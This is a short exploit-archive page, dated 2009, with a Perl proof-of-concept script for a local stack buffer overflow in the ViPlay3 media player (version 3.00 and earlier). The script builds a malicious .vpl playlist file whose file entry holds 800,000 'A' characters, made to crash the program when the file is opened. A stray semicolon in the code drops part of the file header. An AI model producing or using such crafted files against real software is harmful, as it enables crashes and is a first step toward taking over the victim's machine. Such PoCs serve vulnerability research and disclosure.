Home / os / win10

viplay-overflow.txt

Posted on 08 May 2009

#/usr/bin/perl # # ViPlay3 <= 3.00 (.vpl) Local Stack Overflow PoC # # Product web page: http://www.urusoft.net/ # Tested on Microsoft Windows XP Professional SP3 (English) # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # liquidworm gmail com # http://www.zeroscience.org/ # 08.05.2009 $b= "[General] ". "Title=Proof of Concept ". "Author=LiquidWorm ". "Comments=2009 ". "Version=1.0 ". "[Files] "; "Count=800000 ". "LastPlayed=0 "; $c= "1=" . "A" x 800000 . " "; open a, ">./lqwrm.vpl"; print a $b.$c; close a; print " - Done! ";

 

TOP